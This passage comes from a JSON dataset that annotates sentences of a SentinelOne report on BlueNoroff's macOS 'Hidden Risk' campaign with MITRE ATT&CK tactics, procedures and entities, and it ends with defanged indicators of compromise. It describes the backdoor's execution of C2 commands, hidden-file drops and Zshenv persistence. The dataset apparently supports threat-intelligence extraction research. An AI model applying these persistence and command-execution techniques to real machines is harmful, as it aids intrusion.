"tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s46-5395f4", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 46, "context_before": "The User-Agent string also uses cur1-agent (using a 1 in place of the l in “curl”) as reported by Elastic, a fairly unique indicator we have not observed elsewhere.", "sentence_text": "We also see similarities in the way that earlier malware parsed the response from the C2, essentially comparing one of two values as decision logic between awaiting further response, exiting or reading and writing a remote command to file.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s47-dceac4", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 47, "context_before": "We also see similarities in the way that earlier malware parsed the response from the C2, essentially comparing one of two values as decision logic between awaiting further response, exiting or reading and writing a remote command to file.", "sentence_text": "The ProcessRequest function used for this purpose was also the name of an ObjCShellz payload observed in a previous campaign.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s48-2f63ac", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 48, "context_before": "The ProcessRequest function used for this purpose was also the name of an ObjCShellz payload observed in a previous campaign.", "sentence_text": "The\nSaveAndExec\nfunction is responsible for executing any commands received from the C2.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "The SaveAndExec function executes commands received from the C2.", "entities": [ { "text": "SaveAndExec", "start": 4, "end": 15, "label": "MalwareTool" }, { "text": "executing any commands", "start": 44, "end": 66, "label": "Action" }, { "text": "C2", "start": 85, "end": 87, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s49-d2f480", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 49, "context_before": "The\nSaveAndExec\nfunction is responsible for executing any commands received from the C2.", "sentence_text": "This function takes two parameters, the payload received and the length of the payload.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s50-418a4a", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 50, "context_before": "This function takes two parameters, the payload received and the length of the payload.", "sentence_text": "The function parses the malicious payload and calculates indices related to the presence of the characters “#” and the “:”, receiving data from the C2 in the form 0#\\0:command Based on the calculated indices, it creates a random file name of length 6 and writes the received command as a hidden file to /Users/Shared/.%s .", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Creates a random file name of length 6 and writes the received command as a hidden file", "entities": [ { "text": "parses the malicious payload", "start": 13, "end": 41, "label": "Action" }, { "text": "calculates indices", "start": 46, "end": 64, "label": "Action" }, { "text": "0#\\0:command", "start": 163, "end": 175, "label": "Infrastructure_Indicator" }, { "text": "creates a random file name of length 6", "start": 212, "end": 250, "label": "Action" }, { "text": " writes the received command as a hidden file", "start": 254, "end": 299, "label": "Action" }, { "text": "/Users/Shared/.%s", "start": 303, "end": 320, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s51-018d0b", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 51, "context_before": "The function parses the malicious payload and calculates indices related to the presence of the characters “#” and the “:”, receiving data from the C2 in the form 0#\\0:command Based on the calculated indices, it creates a random file name of length 6 and writes the received command as a hidden file to /Users/Shared/.%s .", "sentence_text": "It then uses chmod 0x777 to set the permissions of the file to world read, write and execute, and finally executes it via popen Persistence via Zshenv", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1222", "name": "File and Directory Permissions Modification" }, { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Set the permissions readable, writable and executable, and execute it with popen", "entities": [ { "text": "chmod 0x777", "start": 13, "end": 24, "label": "Infrastructure_Indicator" }, { "text": "executes ", "start": 106, "end": 115, "label": "Action" }, { "text": "popen Persistence via Zshenv", "start": 122, "end": 150, "label": "Infrastructure_Indicator" }, { "text": "set the permissions of the file to world read, write and execute", "start": 28, "end": 92, "label": "Action" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s52-4a9545", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 52, "context_before": "It then uses chmod 0x777 to set the permissions of the file to world read, write and execute, and finally executes it via popen Persistence via Zshenv", "sentence_text": "The backdoor’s operation is functionally similar to previous malware attributed to this threat actor, but what makes it especially interesting is the persistence mechanism, which abuses the Zshenv configuration file.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547", "name": "Boot or Logon Autostart Execution" } ], "procedure": "Persistence mechanism by abusing Zshenv configuration file", "entities": [ { "text": "Zshenv configuration file", "start": 190, "end": 215, "label": "Infrastructure_Indicator" }, { "text": "persistence mechanism", "start": 150, "end": 171, "label": "Action" }, { "text": "abuses ", "start": 179, "end": 186, "label": "Action" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s53-c19a68", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 53, "context_before": "The backdoor’s operation is functionally similar to previous malware attributed to this threat actor, but what makes it especially interesting is the persistence mechanism, which abuses the Zshenv configuration file.", "sentence_text": "Zshenv is one of several optional configuration files used by the Zsh shell.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s54-c9cf8d", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 54, "context_before": "Zshenv is one of several optional configuration files used by the Zsh shell.", "sentence_text": "A system wide version can also be located at /etc/zshenv .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s55-1e06c9", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 55, "context_before": "A system wide version can also be located at /etc/zshenv .", "sentence_text": "It is also read before all other Zsh startup files.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s56-301e66", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 56, "context_before": "It is also read before all other Zsh startup files.", "sentence_text": "In an earlier campaign , BlueNoroff used the ~/.zshrc config file to achieve persistence.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547", "name": "Boot or Logon Autostart Execution" } ], "procedure": "Used ~/.zshrc config file to achieve persistence", "entities": [ { "text": "BlueNoroff ", "start": 25, "end": 36, "label": "ThreatActor" }, { "text": "used the ~/.zshrc config file to achieve persistence", "start": 36, "end": 88, "label": "Action" }, { "text": "~/.zshrc config file", "start": 45, "end": 65, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s57-e8aded", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 57, "context_before": "In an earlier campaign , BlueNoroff used the ~/.zshrc config file to achieve persistence.", "sentence_text": "However, this is a less reliable form of persistence since the file is only sourced when a user launches an interactive Terminal session or subsession from an existing console.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204", "name": "User Execution" } ], "procedure": "File is sourced Only when the User execute terminal session", "entities": [ { "text": "persistence ", "start": 41, "end": 53, "label": "Action" }, { "text": "sourced ", "start": 76, "end": 84, "label": "Action" }, { "text": "user launches an interactive Terminal session or subsession", "start": 91, "end": 150, "label": "Action" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s58-eb01a7", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 58, "context_before": "However, this is a less reliable form of persistence since the file is only sourced when a user launches an interactive Terminal session or subsession from an existing console.", "sentence_text": "Infecting the host with a malicious Zshenv file allows for a more powerful form of persistence.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1546.004", "name": "Event Triggered Execution: Unix Shell Configuration Modification" } ], "procedure": "A malicious Zshenv file is used to persist on the infected host.", "entities": [ { "text": "Infecting the host", "start": 0, "end": 18, "label": "Action" }, { "text": "malicious Zshenv file", "start": 26, "end": 47, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s59-03db2a", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 59, "context_before": "Infecting the host with a malicious Zshenv file allows for a more powerful form of persistence.", "sentence_text": "While this technique is not unknown, it is the first time we have observed it used in the wild by malware authors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s60-b6034e", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 60, "context_before": "While this technique is not unknown, it is the first time we have observed it used in the wild by malware authors.", "sentence_text": "It has particular value on modern versions of macOS since Apple introduced user notifications for background Login Items as of macOS 13 Ventura.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s61-69352b", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 61, "context_before": "It has particular value on modern versions of macOS since Apple introduced user notifications for background Login Items as of macOS 13 Ventura.", "sentence_text": "Apple’s notification aims to warn users when a persistence method is installed, particularly oft-abused LaunchAgents and LaunchDaemons.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s62-5e5c73", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 62, "context_before": "Apple’s notification aims to warn users when a persistence method is installed, particularly oft-abused LaunchAgents and LaunchDaemons.", "sentence_text": "In the binary, installation of the persistence mechanism is handled by the sym.install_char__char_ function.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s63-b09e41", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 63, "context_before": "In the binary, installation of the persistence mechanism is handled by the sym.install_char__char_ function.", "sentence_text": "The mechanism checks for a hidden touch file (zero byte) in the /tmp/ folder called .zsh_init_success .", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1083", "name": "File and Directory Discovery" } ], "procedure": "Checks for a hidden touch file", "entities": [ { "text": "checks for a hidden touch file", "start": 14, "end": 44, "label": "Action" }, { "text": "/tmp/ folder", "start": 64, "end": 76, "label": "Infrastructure_Indicator" }, { "text": ".zsh_init_success", "start": 84, "end": 101, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s64-1a9681", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 64, "context_before": "The mechanism checks for a hidden touch file (zero byte) in the /tmp/ folder called .zsh_init_success .", "sentence_text": "If the file does not exist, then the ‘growth’ binary is called and the touch file is created.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547", "name": "Boot or Logon Autostart Execution" } ], "procedure": "Created touch file", "entities": [ { "text": " ‘growth’ binary is called", "start": 36, "end": 62, "label": "Action" }, { "text": "touch file is created", "start": 71, "end": 92, "label": "Action" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s65-22bc17", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 65, "context_before": "If the file does not exist, then the ‘growth’ binary is called and the touch file is created.", "sentence_text": "Network Infrastructure\nAnalysis of the actor operated and controlled network infrastructure associated with the Hidden Risk campaign further corroborates our confidence in attribution to DPRK’s BlueNoroff threat actor.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1584", "name": "Compromise Infrastructure" } ], "procedure": "Operated and controlled network infrastructure", "entities": [ { "text": "network infrastructure", "start": 69, "end": 91, "label": "Infrastructure_Indicator" }, { "text": "Hidden Risk", "start": 112, "end": 123, "label": "ThreatActor" }, { "text": "BlueNoroff ", "start": 194, "end": 205, "label": "ThreatActor" }, { "text": "operated and controlled", "start": 45, "end": 68, "label": "Action" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s66-f724d5", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 66, "context_before": "Network Infrastructure\nAnalysis of the actor operated and controlled network infrastructure associated with the Hidden Risk campaign further corroborates our confidence in attribution to DPRK’s BlueNoroff threat actor.", "sentence_text": "NameCheap is the predominant domain registrar being abused.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s67-e1208b", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 67, "context_before": "NameCheap is the predominant domain registrar being abused.", "sentence_text": "Various methods of pivoting across network infrastructures and services can be used to connect the Hidden Risk campaign to domains themed around the following organizations, indicating the actors interest in potential targeting and spoofing for targeting on other organizations.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1534", "name": "Internal Spearphishing" }, { "id": "T1583.001", "name": "Domains" } ], "procedure": "Pivot across services to connect the campaign to domains for targeting and spoofing", "entities": [ { "text": " pivoting across network infrastructures and services", "start": 18, "end": 71, "label": "Action" }, { "text": "network infrastructures", "start": 35, "end": 58, "label": "Infrastructure_Indicator" }, { "text": "Hidden Risk", "start": 99, "end": 110, "label": "ThreatActor" }, { "text": "domains ", "start": 123, "end": 131, "label": "Infrastructure_Indicator" }, { "text": "targeting and spoofing", "start": 218, "end": 240, "label": "Action" }, { "text": "connect ", "start": 87, "end": 95, "label": "Action" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s68-f24299", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 68, "context_before": "Various methods of pivoting across network infrastructures and services can be used to connect the Hidden Risk campaign to domains themed around the following organizations, indicating the actors interest in potential targeting and spoofing for targeting on other organizations.", "sentence_text": "When examining the infrastructure of the campaign detailed above in infrastructure analysis tools such as Validin, we can identify clear relations between the initial stage 1 delivery domain ( matuaner[.]com ) and the IPs 45.61.135[.]105 and 172.86.108[.]47 .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s69-38ddf7", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 69, "context_before": "When examining the infrastructure of the campaign detailed above in infrastructure analysis tools such as Validin, we can identify clear relations between the initial stage 1 delivery domain ( matuaner[.]com ) and the IPs 45.61.135[.]105 and 172.86.108[.]47 .", "sentence_text": "Additional valuable pivoting can be achieved by analyzing attributes like DNS TXT records linked to domains that the actor may be using for phishing email delivery.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "Phishing email delivery", "entities": [ { "text": "DNS TXT", "start": 74, "end": 81, "label": "Infrastructure_Indicator" }, { "text": "phishing email delivery", "start": 140, "end": 163, "label": "Action" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s70-67e46b", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 70, "context_before": "Additional valuable pivoting can be achieved by analyzing attributes like DNS TXT records linked to domains that the actor may be using for phishing email delivery.", "sentence_text": "For instance, we’ve observed the actor abusing email marketing automation tools, such as Brevo, where they go so far as to verify domain ownership to meet email authentication standards —an effort to bypass spam and phishing detection filters.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1585.001", "name": "Social Media Accounts" }, { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "Abusing email automation tools to bypass spam and phishing detection filters", "entities": [ { "text": "abusing email marketing automation tools", "start": 39, "end": 79, "label": "Action" }, { "text": "Brevo", "start": 89, "end": 94, "label": "Infrastructure_Indicator" }, { "text": "verify domain ownership", "start": 123, "end": 146, "label": "Action" }, { "text": "bypass spam and phishing detection filters", "start": 200, "end": 242, "label": "Action" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s71-7c2858", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 71, "context_before": "For instance, we’ve observed the actor abusing email marketing automation tools, such as Brevo, where they go so far as to verify domain ownership to meet email authentication standards —an effort to bypass spam and phishing detection filters.", "sentence_text": "This approach has proven effective in uncovering additional BlueNoroff domains linked to the Hidden Risk activity cluster.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s72-8df649", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 72, "context_before": "This approach has proven effective in uncovering additional BlueNoroff domains linked to the Hidden Risk activity cluster.", "sentence_text": "Example Regular Expression:\n/s+e+l+i+n+i+c+a+p+i+t+a+l+\\.[a-z0-9-]+/", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s73-fd455d", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 73, "context_before": "Example Regular Expression:\n/s+e+l+i+n+i+c+a+p+i+t+a+l+\\.[a-z0-9-]+/", "sentence_text": "The extensive collection of BlueNoroff infrastructure we’ve gathered over the years, recently expanded through the latest Hidden Risk campaign activity, prevents us from detailing every unique pivoting method as this actor continues to evolve.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s74-18abed", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 74, "context_before": "The extensive collection of BlueNoroff infrastructure we’ve gathered over the years, recently expanded through the latest Hidden Risk campaign activity, prevents us from detailing every unique pivoting method as this actor continues to evolve.", "sentence_text": "As with all quality threat intelligence, our goal is to aid defenders while carefully managing the exposure of our tracking techniques to the actor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s75-3d94d1", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 75, "context_before": "As with all quality threat intelligence, our goal is to aid defenders while carefully managing the exposure of our tracking techniques to the actor.", "sentence_text": "However, we are sharing a broader set of associated infrastructure in the Indicator of Compromise section below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s76-ad5503", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 76, "context_before": "However, we are sharing a broader set of associated infrastructure in the Indicator of Compromise section below.", "sentence_text": "We observe that the Hidden Risk campaign diverts from this strategy taking a more traditional and cruder, though not necessarily any less effective, email phishing approach.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "Email phishing", "entities": [ { "text": "Hidden Risk", "start": 20, "end": 31, "label": "ThreatActor" }, { "text": "email phishing", "start": 149, "end": 163, "label": "Action" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s77-71611f", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 77, "context_before": "We observe that the Hidden Risk campaign diverts from this strategy taking a more traditional and cruder, though not necessarily any less effective, email phishing approach.", "sentence_text": "Indicators of Compromise IP Addresses 23[.]254.253[.]75 45[.]61.128[.]122 45[.]61.135[.]105 45[.]61.140[.]26 139[.]99.66[.]103 144[.]172.74[.]23 144[.]172.74[.]141 172[.]86.102[.]98 172[.]86.108[.]47 216[.]107.136[.]10 Domains analysis.arkinvst[.]com appleaccess[.]pro arkinvst[.]com atajerefoods[.]com buy2x[.]com calendly[.]caladan[.]video cardiagnostic[.]net cmt[.]ventures community.edwardcaputo[.]shop community.kevinaraujo[.]shop community.selincapital[.]com community.selincapital[.]com customer-app[.]xyz delphidigital[.]org doc.solanalab[.]org dourolab[.]xyz drogueriasanjose[.]net edwardcaputo[.]shop evalaskatours[.]com happyz[.]one hwsrv-1225327.hostwindsdns[.]com info.ankanimatoka[.]com info.customer-app[.]xyz kevinaraujo[.]shop maelstromfund[.]org maelstroms[.]fund matuaner[.]com mbupdate.linkpc[.]net mc.tvdhoenn[.]net meet.caladan[.]video meet.caladangroup[.]xyz meet.hananetwork[.]video meet.selinicapital[.]info meet.selinicapital[.]online meet.selinicapital[.]xyz meet.sellinicapital[.]com meeting.sellinicapital[.]com meeting.zoom-client[.]com mg21.1056[.]uk nodnote.com online.selinicapital[.]info online.zoom-client[.]com panda95sg[.]asia", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s78-80d72e", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 78, "context_before": "Indicators of Compromise IP Addresses 23[.]254.253[.]75 45[.]61.128[.]122 45[.]61.135[.]105 45[.]61.140[.]26 139[.]99.66[.]103 144[.]172.74[.]23 144[.]172.74[.]141 172[.]86.102[.]98 172[.]86.108[.]47 216[.]107.136[.]10 Domains analysis.arkinvst[.]com appleaccess[.]pro arkinvst[.]com atajerefoods[.]com buy2x[.]com calendly[.]caladan[.]video cardiagnostic[.]net cmt[.]ventures community.edwardcaputo[.]shop community.kevinaraujo[.]shop community.selincapital[.]com community.selincapital[.]com customer-app[.]xyz delphidigital[.]org doc.solanalab[.]org dourolab[.]xyz drogueriasanjose[.]net edwardcaputo[.]shop evalaskatours[.]com happyz[.]one hwsrv-1225327.hostwindsdns[.]com info.ankanimatoka[.]com info.customer-app[.]xyz kevinaraujo[.]shop maelstromfund[.]org maelstroms[.]fund matuaner[.]com mbupdate.linkpc[.]net mc.tvdhoenn[.]net meet.caladan[.]video meet.caladangroup[.]xyz meet.hananetwork[.]video meet.selinicapital[.]info meet.selinicapital[.]online meet.selinicapital[.]xyz meet.sellinicapital[.]com meeting.sellinicapital[.]com meeting.zoom-client[.]com mg21.1056[.]uk nodnote.com online.selinicapital[.]info online.zoom-client[.]com panda95sg[.]asia", "sentence_text": "pixelmonmmo[.]net presentations[.]life selincapital[.]com selinicapital[.]info selinicapital[.]network selinicapital[.]online sellinicapital[.]com sendmailed[.]com sendmailer[.]org shh5.baranftw[.]xyz tvdhoenn[.]net verify.selinicapital[.]info versionupdate.dns[.]army xu10.1056[.]uk zoom-client[.]com DPRK Share Raffaele Sabato Raffaele Sabato is a Senior Detection Engineer at SentinelOne, specializing in macOS malware and application exploitation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s79-a0cff3", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 79, "context_before": "pixelmonmmo[.]net presentations[.]life selincapital[.]com selinicapital[.]info selinicapital[.]network selinicapital[.]online sellinicapital[.]com sendmailed[.]com sendmailer[.]org shh5.baranftw[.]xyz tvdhoenn[.]net verify.selinicapital[.]info versionupdate.dns[.]army xu10.1056[.]uk zoom-client[.]com DPRK Share Raffaele Sabato Raffaele Sabato is a Senior Detection Engineer at SentinelOne, specializing in macOS malware and application exploitation.", "sentence_text": "He began his journey into Apple security as an offensive security consultant, performing vulnerability research with a focus on macOS and iOS applications.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s80-c17214", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 80, "context_before": "He began his journey into Apple security as an offensive security consultant, performing vulnerability research with a focus on macOS and iOS applications.", "sentence_text": "His research includes studying novel attack vectors and developing new detection methods.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s81-c8fc29", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 81, "context_before": "His research includes studying novel attack vectors and developing new detection methods.", "sentence_text": "He began his journey into macOS security as a software developer, creating end user troubleshooting and security tools just at the time when macOS adware and commodity malware first began appearing on the platform.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s82-8227e4", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 82, "context_before": "He began his journey into macOS security as a software developer, creating end user troubleshooting and security tools just at the time when macOS adware and commodity malware first began appearing on the platform.", "sentence_text": "Phil has been closely following the development of macOS threats as well as researching Mac software and OS vulnerabilities since 2014.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s83-9252ea", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 83, "context_before": "Phil has been closely following the development of macOS threats as well as researching Mac software and OS vulnerabilities since 2014.", "sentence_text": "Tom Hegel\nAn accomplished cybersecurity researcher and a leader in the threat intelligence space, with a background of tracking some of the most interesting and unique threat actors globally.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s84-3d6d9a", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 84, "context_before": "Tom Hegel\nAn accomplished cybersecurity researcher and a leader in the threat intelligence space, with a background of tracking some of the most interesting and unique threat actors globally.", "sentence_text": "Tom's dedication lies in driving cutting-edge cyber threat intelligence and research, collaborating with top-tier analysts and organizations worldwide.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s85-6915b5", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 85, "context_before": "Tom's dedication lies in driving cutting-edge cyber threat intelligence and research, collaborating with top-tier analysts and organizations worldwide.", "sentence_text": "His work has led to the discovery of new mercenary groups, emerging geopolitical cyber campaigns, and critical insights into global conflicts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s86-ca10d3", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 86, "context_before": "His work has led to the discovery of new mercenary groups, emerging geopolitical cyber campaigns, and critical insights into global conflicts.", "sentence_text": "Prev\nCloud Malware | A Threat Hunter’s Guide to Analysis, Techniques and Delivery Next DPRK IT Workers", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s87-b03699", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 87, "context_before": "Prev\nCloud Malware | A Threat Hunter’s Guide to Analysis, Techniques and Delivery Next DPRK IT Workers", "sentence_text": "| A Network of Active Front Companies and Their Links to China Related Posts Ghost in the Zip | New PXA Stealer and Its Telegram-Powered Ecosystem August 04 2025 China’s Covert Capabilities | Silk Spun From Hafnium July 30 2025 macOS NimDoor | DPRK Threat Actors Target Web3 and Crypto Platforms with Nim-Based Malware July 02 2025 [FILTERED_TABLES_START]\n05c178891ca1e65af53bbcfdbec573da3f74d176", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "DPRK threat actors target Web3 and crypto platforms with Nim-based malware", "entities": [ { "text": "PXA Stealer", "start": 100, "end": 111, "label": "ThreatActor" }, { "text": "Telegram-Powered Ecosystem", "start": 120, "end": 146, "label": "Infrastructure_Indicator" }, { "text": "DPRK Threat Actors", "start": 244, "end": 262, "label": "ThreatActor" }, { "text": "Web3 ", "start": 270, "end": 275, "label": "Infrastructure_Indicator" }, { "text": "Crypto Platforms", "start": 279, "end": 295, "label": "Infrastructure_Indicator" }, { "text": "Nim-Based Malware", "start": 301, "end": 318, "label": "MalwareTool" }, { "text": "Target ", "start": 263, "end": 270, "label": "Action" } ] }, { "uid": "sentinel-54_SentinelOne_report-p1-s88-9108e7", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 88, "context_before": "| A Network of Active Front Companies and Their Links to China Related Posts Ghost in the Zip | New PXA Stealer and Its Telegram-Powered Ecosystem August 04 2025 China’s Covert Capabilities | Silk Spun From Hafnium July 30 2025 macOS NimDoor | DPRK Threat Actors Target Web3 and Crypto Platforms with Nim-Based Malware July 02 2025 [FILTERED_TABLES_START]\n05c178891ca1e65af53bbcfdbec573da3f74d176", "sentence_text": "| Dropper | Macho | arm64 3f17c5a7d1e7fd138163d8039e614b8a967a56cb | Dropper", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s90-41ad44", "source": "sentinel", "doc_id": "54_SentinelOne_report", "page_number": 1, "sentence_id": 90, "context_before": "| App", "sentence_text": "| Universal 7e07765bf8ee2d0b2233039623016d6dfb610a6d | Backdoor | Macho | x86_64", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-54_SentinelOne_report-p1-s91-d1d61d", "source": 